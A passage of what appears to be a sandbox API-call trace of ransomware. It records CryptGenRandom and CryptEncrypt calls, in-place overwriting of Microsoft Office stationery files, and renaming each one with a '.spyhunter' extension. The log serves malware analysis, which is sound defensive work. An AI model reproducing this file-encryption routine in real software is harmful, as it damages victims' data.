0x2c0000 [0112.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.352] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f774*=0x1fd, lpOverlapped=0x0) returned 1 [0112.353] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.353] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1fd, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f774*=0x1fd, lpOverlapped=0x0) returned 1 [0112.353] GetProcessHeap () returned 0x2c0000 [0112.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.353] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.353] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x270f7b4*, lpNumberOfBytesWritten=0x270f774*=0x4, lpOverlapped=0x0) returned 1 [0112.353] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f774*=0x30, lpOverlapped=0x0) returned 1 [0112.353] CloseHandle (hObject=0x16c) returned 1 [0112.353] GetProcessHeap () returned 0x2c0000 [0112.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.354] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM.spyhunter") returned 76 [0112.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.htm.spyhunter")) returned 1 [0112.354] GetProcessHeap () returned 0x2c0000 [0112.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.354] GetProcessHeap () returned 0x2c0000 [0112.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.354] GetProcessHeap () returned 0x2c0000 [0112.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02200 | out: hHeap=0x2c0000) returned 1 [0112.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7b8 | out: pbBuffer=0x270f7b8) returned 1 [0112.354] GetProcessHeap () returned 0x2c0000 [0112.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7b0*=0x30) returned 1 [0112.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.355] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG") returned 66 [0112.356] StrStrW (lpFirst="PINELUMB.JPG", lpSrch=".txt") returned 0x0 [0112.356] GetProcessHeap () returned 0x2c0000 [0112.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.356] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f774*=0xf8d, lpOverlapped=0x0) returned 1 [0112.366] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff073, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.367] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf8d, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f774*=0xf8d, lpOverlapped=0x0) returned 1 [0112.367] GetProcessHeap () returned 0x2c0000 [0112.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.367] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.367] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x270f7b4*, lpNumberOfBytesWritten=0x270f774*=0x4, lpOverlapped=0x0) returned 1 [0112.367] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f774, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f774*=0x30, lpOverlapped=0x0) returned 1 [0112.367] CloseHandle (hObject=0x16c) returned 1 [0112.367] GetProcessHeap () returned 0x2c0000 [0112.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.367] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG.spyhunter") returned 76 [0112.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.jpg.spyhunter")) returned 1 [0112.369] GetProcessHeap () returned 0x2c0000 [0112.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.369] GetProcessHeap () returned 0x2c0000 [0112.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.369] GetProcessHeap () returned 0x2c0000 [0112.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02130 | out: hHeap=0x2c0000) returned 1 [0112.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7b0 | out: pbBuffer=0x270f7b0) returned 1 [0112.369] GetProcessHeap () returned 0x2c0000 [0112.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7a8*=0x30) returned 1 [0112.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.370] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM") returned 66 [0112.370] StrStrW (lpFirst="PINELUMB.HTM", lpSrch=".txt") returned 0x0 [0112.370] GetProcessHeap () returned 0x2c0000 [0112.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.370] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f76c*=0x1e9, lpOverlapped=0x0) returned 1 [0112.371] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.371] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1e9, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f76c*=0x1e9, lpOverlapped=0x0) returned 1 [0112.371] GetProcessHeap () returned 0x2c0000 [0112.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.371] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.371] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x270f7ac*, lpNumberOfBytesWritten=0x270f76c*=0x4, lpOverlapped=0x0) returned 1 [0112.371] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f76c*=0x30, lpOverlapped=0x0) returned 1 [0112.371] CloseHandle (hObject=0x16c) returned 1 [0112.371] GetProcessHeap () returned 0x2c0000 [0112.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.371] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM.spyhunter") returned 76 [0112.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.htm.spyhunter")) returned 1 [0112.372] GetProcessHeap () returned 0x2c0000 [0112.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.372] GetProcessHeap () returned 0x2c0000 [0112.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.372] GetProcessHeap () returned 0x2c0000 [0112.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02060 | out: hHeap=0x2c0000) returned 1 [0112.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7b0 | out: pbBuffer=0x270f7b0) returned 1 [0112.372] GetProcessHeap () returned 0x2c0000 [0112.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7a8*=0x30) returned 1 [0112.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM") returned 66 [0112.373] StrStrW (lpFirst="PAWPRINT.HTM", lpSrch=".txt") returned 0x0 [0112.373] GetProcessHeap () returned 0x2c0000 [0112.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.373] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f76c*=0x1dc, lpOverlapped=0x0) returned 1 [0112.374] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.374] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1dc, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f76c*=0x1dc, lpOverlapped=0x0) returned 1 [0112.374] GetProcessHeap () returned 0x2c0000 [0112.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.374] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.374] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x270f7ac*, lpNumberOfBytesWritten=0x270f76c*=0x4, lpOverlapped=0x0) returned 1 [0112.374] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f76c*=0x30, lpOverlapped=0x0) returned 1 [0112.374] CloseHandle (hObject=0x16c) returned 1 [0112.375] GetProcessHeap () returned 0x2c0000 [0112.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.375] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM.spyhunter") returned 76 [0112.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.htm.spyhunter")) returned 1 [0112.375] GetProcessHeap () returned 0x2c0000 [0112.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.375] GetProcessHeap () returned 0x2c0000 [0112.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.375] GetProcessHeap () returned 0x2c0000 [0112.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01f90 | out: hHeap=0x2c0000) returned 1 [0112.376] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7a8 | out: pbBuffer=0x270f7a8) returned 1 [0112.376] GetProcessHeap () returned 0x2c0000 [0112.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7a0*=0x30) returned 1 [0112.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.376] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.GIF") returned 66 [0112.376] StrStrW (lpFirst="PAWPRINT.GIF", lpSrch=".txt") returned 0x0 [0112.376] GetProcessHeap () returned 0x2c0000 [0112.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.376] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f764*=0x45b, lpOverlapped=0x0) returned 1 [0112.394] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffba5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.394] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f764*=0x45b, lpOverlapped=0x0) returned 1 [0112.394] GetProcessHeap () returned 0x2c0000 [0112.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.394] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.394] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x270f7a4*, lpNumberOfBytesWritten=0x270f764*=0x4, lpOverlapped=0x0) returned 1 [0112.395] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f764*=0x30, lpOverlapped=0x0) returned 1 [0112.395] CloseHandle (hObject=0x16c) returned 1 [0112.395] GetProcessHeap () returned 0x2c0000 [0112.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.395] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.GIF.spyhunter") returned 76 [0112.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.gif.spyhunter")) returned 1 [0112.395] GetProcessHeap () returned 0x2c0000 [0112.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.396] GetProcessHeap () returned 0x2c0000 [0112.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.396] GetProcessHeap () returned 0x2c0000 [0112.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01ec0 | out: hHeap=0x2c0000) returned 1 [0112.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7a8 | out: pbBuffer=0x270f7a8) returned 1 [0112.396] GetProcessHeap () returned 0x2c0000 [0112.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7a0*=0x30) returned 1 [0112.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM") returned 66 [0112.397] StrStrW (lpFirst="NOTEBOOK.HTM", lpSrch=".txt") returned 0x0 [0112.397] GetProcessHeap () returned 0x2c0000 [0112.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.397] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f764*=0x1ed, lpOverlapped=0x0) returned 1 [0112.398] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.398] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1ed, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f764*=0x1ed, lpOverlapped=0x0) returned 1 [0112.398] GetProcessHeap () returned 0x2c0000 [0112.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.398] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.398] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x270f7a4*, lpNumberOfBytesWritten=0x270f764*=0x4, lpOverlapped=0x0) returned 1 [0112.398] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f764, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f764*=0x30, lpOverlapped=0x0) returned 1 [0112.399] CloseHandle (hObject=0x16c) returned 1 [0112.399] GetProcessHeap () returned 0x2c0000 [0112.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.399] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM.spyhunter") returned 76 [0112.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.htm.spyhunter")) returned 1 [0112.399] GetProcessHeap () returned 0x2c0000 [0112.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.400] GetProcessHeap () returned 0x2c0000 [0112.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.400] GetProcessHeap () returned 0x2c0000 [0112.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01b80 | out: hHeap=0x2c0000) returned 1 [0112.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7a0 | out: pbBuffer=0x270f7a0) returned 1 [0112.400] GetProcessHeap () returned 0x2c0000 [0112.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f798*=0x30) returned 1 [0112.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.401] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM") returned 64 [0112.401] StrStrW (lpFirst="JUNGLE.HTM", lpSrch=".txt") returned 0x0 [0112.401] GetProcessHeap () returned 0x2c0000 [0112.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.402] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f75c*=0x201, lpOverlapped=0x0) returned 1 [0112.402] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffdff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.402] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f75c*=0x201, lpOverlapped=0x0) returned 1 [0112.403] GetProcessHeap () returned 0x2c0000 [0112.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.403] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.403] WriteFile (in: hFile=0x16c, lpBuffer=0x270f79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x270f79c*, lpNumberOfBytesWritten=0x270f75c*=0x4, lpOverlapped=0x0) returned 1 [0112.403] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f75c*=0x30, lpOverlapped=0x0) returned 1 [0112.403] CloseHandle (hObject=0x16c) returned 1 [0112.403] GetProcessHeap () returned 0x2c0000 [0112.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.403] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM.spyhunter") returned 74 [0112.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 